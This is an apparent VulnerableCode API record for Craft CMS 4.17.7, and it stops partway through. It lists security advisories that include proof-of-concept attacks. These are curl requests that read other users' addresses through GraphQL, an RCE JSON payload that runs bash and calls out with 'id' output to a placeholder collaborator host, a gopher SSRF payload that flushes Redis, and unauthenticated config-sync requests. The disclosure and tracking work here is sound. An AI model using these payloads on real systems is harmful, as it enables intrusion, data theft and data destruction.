Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/992797?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/992797?format=api", "purl": "pkg:composer/craftcms/cms@4.17.7", "type": "composer", "namespace": "craftcms", "name": "cms", "version": "4.17.7", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "4.17.12", "latest_non_vulnerable_version": "5.9.18", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95319?format=api", "vulnerability_id": "VCID-41uv-1axm-fugb", "summary": "Craft CMS's Missing Authorization in GraphQL Address Resolver Allows Cross-Scope PII Disclosure\n### Summary\n\nThe GraphQL Address element resolver (src/gql/resolvers/elements/Address.php) performs no schema scope filtering on top-level queries. A GraphQL API token scoped to a single low-privilege user group can read every address in the system, including addresses belonging to users in groups the token has no authorization to access. This exposes PII, including full names, addresses, organizations, tax IDs, etc.\n\n### Details\n\nEvery GraphQL element resolver in Craft CMS applies schema scope filtering via `GqlHelper::extractAllowedEntitiesFromSchema()` when handling top-level queries, except the Address resolver.\n\nThe only gate check for addresses is `canQueryUsers()` (`src/gql/queries/Address.php`, line 30), which is a binary check. It returns `true` if the token has access to *any* user group. Once past this gate, no further filtering is applied.\n\n### PoC\n\n**Tested on:** CraftCMS 5.9.17 (fresh Docker install, PHP 8.3)\n**Prerequisites:** A GraphQL API token with read access to any single user group\n\n### Environment\n\n- Two user groups: `publicUsers` (in token scope) and `internalTeam` (NOT in scope)\n- 5 internal executives with corporate addresses (internalTeam)\n- 3 public customers with personal addresses (publicUsers)\n- GQL token scoped to `publicUsers:read` only\n\n**Step 1:** Introspect the schema to discover the `addresses` query is available to this token. Issue the below curl command \n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"Query\\\") { fields { name description } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1641\" height=\"856\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d798b4d2-9965-40fd-8252-ba6b08d1dde9\" />\n\nThe token can see `addresses`, `entries`, `users` as top-level queries.\n\n**Step 2:** Enumerate Address fields to identify PII exposure surface.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"AddressInterface\\\") { fields { name\ntype { name } } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1726\" height=\"862\" alt=\"image\" src=\"https://github.com/user-attachments/assets/31a90b5d-7337-49b9-8802-355f16b7b4f3\" />\n\n> Exposed fields include: `fullName`, `firstName`, `lastName`, `addressLine1/2/3`, `locality`, `postalCode`, `countryCode`, `organization`, `organizationTaxId`, `latitude`, `longitude`.\n> \n\n**Step 3:** Establish baseline - confirm the token’s user scope is limited. This proves our token only has access to the `publicUsers` group.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\norganizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1626\" height=\"492\" alt=\"image\" src=\"https://github.com/user-attachments/assets/42ec8c3d-d1ae-4eac-9202-af072f394e4a\" />\n\nOnly 5 public users returned. Scope enforcement works correctly for the User resolver — internal executives are NOT visible.\n\n**Step 4:** Query all addresses - the token returns data for ALL user groups, including those outside its authorized scope.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\n organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"910\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef34e11c-36a8-4582-93e3-04c3e4dad6ab\" />\n\n<img width=\"1444\" height=\"942\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64d6edec-60bf-4481-8a20-7f64c81c015b\" />\n\n\n ▎ \"This token can only see 5 users, but it returns 10 addresses\" as shown in the above 2 screenshot outputs\n\n> **All 10 addresses returned.** The same token that only sees 5 public users now returns addresses for internal executives including corporate tax IDs:\n> \n> - Sarah Chen, 4200 Executive Plaza Dr, SF — Horizon Dynamics Inc. (TaxID: 82-4917263)\n> - James Whitfield, 89 Kensington High St, London — Whitfield Capital Partners LLP (TaxID: GB927461038)\n> - Maria Rossi, 15 Via della Conciliazione, Roma — Rossi & Bianchi Avvocati (TaxID: IT04829173651)\n> - David Nakamura, 2-11-3 Meguro, Tokyo — Nakamura Medical Technologies KK (TaxID: JP8230-4719-2835)\n> - Elena Voronova, 27 Universitätsstrasse, Zurich — Voronova Biotech AG (TaxID: CHE-384.291.057)\n\n---\n\n**Step 5:** Targeted IDOR - extract a specific internal user’s address by owner ID.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses(ownerId: [3]) { fullName addressLine1 addressLine2 locality postalCode countryCode organization\n organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b7c6d5cf-295a-433a-a76c-2b69815968cd\" />\n\n> Directly extracts a specific internal team member’s address: “Secret Admin”, 1 Secret Government Facility, Suite 007, Langley 22101 — SecretCorp LLC (TaxID: 98-7654321). The token has zero authorization to access this user’s data.\n\n## Impact \n\n### Who is Impacted\n\nAny Craft CMS Pro site (v4.0.0+) that uses GraphQL API tokens with user group scoping and stores user addresses. This is the standard deployment pattern for headless CMS sites using frameworks such as Next.js, Nuxt.js, or Gatsby. An attacker with any valid GraphQL token that has access to at least one user group can extract all addresses in the system, regardless of scope restrictions.\n\n### Risk\n\n- Direct threat to installation data: Any GraphQL API token with access to any single user group can extract all address systems-wide, including names, home addresses, organizations, and tax IDs belonging to users in restricted groups.\n\n- Targeted extraction via IDOR: The `ownerId` argument allows an attacker to extract specific users’ addresses by ID, enabling targeted reconnaissance against administrators or high-value users without any brute-force or elevated access.\n\n- Scope boundary failure: Craft CMS’s GraphQL schema scoping system is the primary security mechanism for controlling API access. Every other element resolver (Entry, User, Asset, Category, Tag) enforces this boundary. The Address resolver does not, making this a foundational gap in Craft’s native authorization model and not a site-specific configuration issue.\n\n- Affects all installations using GraphQL with user groups: Any Craft CMS Pro site that exposes a scoped GraphQL token and stores addresses is affected. This is the standard headless CMS deployment pattern, not an edge case.\n\n## AI Disclosure\n\nThis vulnerability was identified through manual source code review with AI-assisted analysis (Claude). The initial pattern deviation (Address resolver missing scope filtering while all other resolvers have it) was identified through manual comparison of resolver implementations. AI was used to assist with code navigation, PoC scripting, and report drafting. \n\nAll findings were verified against a local Docker instance of Craft CMS 5.9.17.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44010", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02886", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44010" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/" } ], "url": "https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44010", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44010" }, { "reference_url": "https://github.com/advisories/GHSA-gj2p-p9m4-c8gw", "reference_id": "GHSA-gj2p-p9m4-c8gw", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-gj2p-p9m4-c8gw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/118774?format=api", "purl": "pkg:composer/craftcms/cms@4.17.12", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/118776?format=api", "purl": "pkg:composer/craftcms/cms@5.9.18", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18" } ], "aliases": [ "CVE-2026-44010", "GHSA-gj2p-p9m4-c8gw" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-41uv-1axm-fugb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95139?format=api", "vulnerability_id": "VCID-9ca4-tbhq-27ad", "summary": "Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior\nWe identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: …\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n \"elementType\": \"craft\\\\elements\\\\Category\",\n \"siteId\": 1,\n \"search\": \"\",\n \"condition\": {\n \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n \"elementType\": \"craft\\\\elements\\\\Category\",\n \"fieldLayouts\": [\n {\n \"as rce\": {\n \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n \"__construct()\": [\n {\n \"attributeTypes\": {\n \"typecastBeforeSave\": [\n \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n \"execute\"\n ]\n },\n \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n }\n ]\n },\n \"on *\": \"self::beforeSave\"\n }\n ]\n }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44011", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06383", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44011" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/" } ], "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5", "reference_id": "GHSA-255j-qw47-wjh5", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5" }, { "reference_url": "https://github.com/advisories/GHSA-qrgm-p9w5-rrfw", "reference_id": "GHSA-qrgm-p9w5-rrfw", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-qrgm-p9w5-rrfw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/118774?format=api", "purl": "pkg:composer/craftcms/cms@4.17.12", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/118776?format=api", "purl": "pkg:composer/craftcms/cms@5.9.18", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18" } ], "aliases": [ "CVE-2026-44011", "GHSA-qrgm-p9w5-rrfw" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ca4-tbhq-27ad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89237?format=api", "vulnerability_id": "VCID-e94m-mj1k-8kbr", "summary": "Server-Side Request Forgery (SSRF) in Craft CMS with Asset Uploads Mutations\n## Required Permissions\n\nThe exploitation requires a few permissions to be enabled in the used GraphQL schema:\n\n* \"Edit assets in the <VolumeName> volume\"\n* \"Create assets in the <VolumeName> volume\"\n\n## Details\n\nThe implementation fails to restrict the URL Scheme. While the application is intended to \"upload assets\", there is no whitelist forcing `http` or `https`. This allows attackers to use the Gopher protocol to wrap raw TCP commands.\n\n**Impact:** Combined with the DWORD bypass, an attacker can hit internal services without triggering any \"127.0.0.1\" string-matching filters.\n\n**Example Payload:** gopher://2130706433:6379/_FLUSHALL (Targets local Redis via DWORD).\n\n**Remediation Strategy**\n\nTo prevent mathematical IP obfuscation, the application must normalize the hostname before validation.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41129", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13052", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41129" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/" } ], "url": "https://github.com/craftcms/cms/commit/d20aecfaa0eae076c4154be3b17e1f9fa05ce46f" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-22T17:52:52Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3m9m-24vh-39wx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41129", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41129" }, { "reference_url": "https://github.com/advisories/GHSA-3m9m-24vh-39wx", "reference_id": "GHSA-3m9m-24vh-39wx", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3m9m-24vh-39wx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110279?format=api", "purl": "pkg:composer/craftcms/cms@4.17.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/110278?format=api", "purl": "pkg:composer/craftcms/cms@5.9.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-asek-4gme-gug8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.15" } ], "aliases": [ "CVE-2026-41129", "GHSA-3m9m-24vh-39wx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e94m-mj1k-8kbr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91200?format=api", "vulnerability_id": "VCID-eaxm-rjr7-xudb", "summary": "Craft CMS: Unauthenticated Users Can Perform Restricted Project Config Sync Operations\n### Summary\nGuest users can access Config Sync updater `index`, obtain signed `data`, and execute state-changing Config Sync actions (`regenerate-yaml`, `apply-yaml-changes`) without authentication.\n\n### Details\n\n`ConfigSyncController` extends `BaseUpdaterController`, and the base updater is anonymously accessible for control panel requests. `index` emits signed updater state (`data`), which can be reused by guests in subsequent requests.\n\nSensitive actions that are reachable via this method are `actionApplyYamlChanges`, `actionRegenerateYaml`, `applyExternalChanges`, and `regenerateExternalConfig`.\n\n#### Reproduction steps\n\n1. Guest POST to:\n\n http POST /admin/actions/config-sync/index\n\n 2. Extract data from returned JS state:\n\n Craft.updater = ... setState({\"data\":\"<signedData>\", ...});\n\n 3. Reuse data as a guest:\n\n```\n POST /admin/actions/config-sync/regenerate-yaml\n data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n or\n\n```\n POST /admin/actions/config-sync/apply-yaml-changes\n data=<signedData>&<csrfParam>=<csrfToken>\n```\n\n 4. Observe completed response and state/file changes.\n\n### Impact\n\nUnauthenticated users can execute project configuration sync operations that should be restricted to trusted admin/deployment contexts.\n\nDepending on the pending YAML/config state, this can cause unauthorized config state transitions and a service integrity risk.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7f0ead833f7", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33159", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06623", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33159" }, { "reference_url": "https://github.com/craftcms/cms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/craftcms/cms" }, { "reference_url": "https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/" } ], "url": "https://github.com/craftcms/cms/commit/7f0ead833f7c2b91ae12003caad833479dd08592" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/4.17.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/4.17.8" }, { "reference_url": "https://github.com/craftcms/cms/releases/tag/5.9.14", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/" } ], "url": "https://github.com/craftcms/cms/releases/tag/5.9.14" }, { "reference_url": "https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/" } ], "url": "https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33159", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33159" }, { "reference_url": "https://github.com/advisories/GHSA-6mrr-q3pj-h53w", "reference_id": "GHSA-6mrr-q3pj-h53w", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-6mrr-q3pj-h53w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113239?format=api", "purl": "pkg:composer/craftcms/cms@4.17.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/113238?format=api", "purl": "pkg:composer/craftcms/cms@5.9.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-41uv-1axm-fugb" }, { "vulnerability": "VCID-9ca4-tbhq-27ad" }, { "vulnerability": "VCID-a8p2-5cmc-n7g2" }, { "vulnerability": "VCID-asek-4gme-gug8" }, { "vulnerability": "VCID-e94m-mj1k-8kbr" }, { "vulnerability": "VCID-gzry-xtu5-ukhu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14" } ], "aliases": [ "CVE-2026-33159", "GHSA-6mrr-q3pj-h53w" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eaxm-rjr7-xudb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91247?format=api", "vulnerability_id": "VCID-fpke-p7sz-nfc9", "summary": "Craft CMS may expose private assets through anonymous \"generate transform\" calls via transform URL\n### Summary\n\nAn unauthenticated user can call `assets/generate-transform` with a private `assetId`, receive a valid transform URL, and fetch transformed image bytes.\n\nThe endpoint is anonymous and does not enforce per-asset authorization before returning the transform URL.\n\n### Details\n\nRoot cause:\n- Anonymous endpoint accepts user-controlled asset reference.\n- It creates and returns a transform URL for that asset without checking access rights.\n- If the transform output is reachable, guest users can read content derived from private assets.\n\nWho is impacted:\n\n- Installations where private source assets can be transformed and transform URLs are reachable.\n\nSecurity consequence:\n\n - Anonymous users can obtain content derived from private assets without authentication.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33160", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03997", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33160" }, { "reference_url": "https://github.com/craftcms/cms", 